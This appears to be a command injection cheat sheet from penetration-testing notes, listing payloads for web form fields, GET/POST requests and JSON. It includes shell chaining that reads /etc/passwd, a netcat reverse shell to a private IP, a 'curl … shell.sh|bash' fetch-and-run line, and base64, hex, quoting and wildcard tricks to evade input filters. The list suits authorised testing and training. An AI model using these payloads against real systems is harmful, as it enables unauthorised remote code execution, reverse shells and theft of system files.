Command Injection

Manual Testing

;
|
&&

For example

# You should encode them when sending 
something|id|ifconfig  
something;id;ifconfig
something&id&ifconfig
www.c.gov; cat /etc/passwd
www.c.gov; nc 192.168.142.148 8000 -e /bin/bash

# POST
email=test@test.com;sleep+20&subject=test&message=test
email=test@test.com;ping -c 5 10.10.14.4&subject=test&message=test

# GET
GET/remote_agent.php?
action=polldata&poller_id=;curl+http://10.10.14.39&host_id=1&local_data_ids[]=6HTTP/1.1

# Json format
{"username":"test;id;"} 

# These are special characters that might be blocked already
( ) [ ] { } " , ' ` ; # | \ &

Payloads to execute both commands

ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

Some Linux specifc payloads

# Some special characters to include 

`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

# curl
curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'
# BURP
host=127.0.0.1&username=`curl${IFS}10.10.14.25/shell.sh|bash`

For example

# use `<command>` to execute the shell
# use ${IFS} to represent a 'space' 
host=127.0.0.1&username=`curl${IFS}10.10.14.25/shell.sh|bash`

Basic filtering bypass

# base64
# encode the command
>echo 'ping -c 5 192.168.142.141' | base64
>cGluZyAtYyA1IDE5Mi4xNjguMTQyLjE0MQo=

# decode the command and run
something|echo cGluZyAtYyA1IDE5Mi4xNjguMTQyLjE0MQo= | base64 -d | bash

# hex stings
# encode the command
echo "cat flag" | tr -d '\n' | xxd -ps -c 200x
# decode the command and run
something| echo 0x63617420666c6167 | tr -d '\n' | xxd -r -p | bash 

Other interesting filtering bypass

# String concatanation trick to code execution
https://<URL>/?name=hacker"."blah"."blah
https://<URL>/?name=hacker".system("id")."blah

# Single quotation mark bypass
w'h'o'am'I

# Double Quotes Bypass
w"h"o"am"I

# Backslash
c\at fl\ag

# Regular expressioins (Assume / bin/cat: test: is a directory)
/???/?[a][t] ?''?''?''?''`
`/???/?at ????`
`/???/?[a]''[t] ?''?''?''?''

# Use $@ to bypass
who$@ami

# Bypass with wildcards
powershell C:\*\*2\n??e*d.*? # notepad

# From <https://www.fatalerrors.org/a/ping-command-execution-and-bypass.html>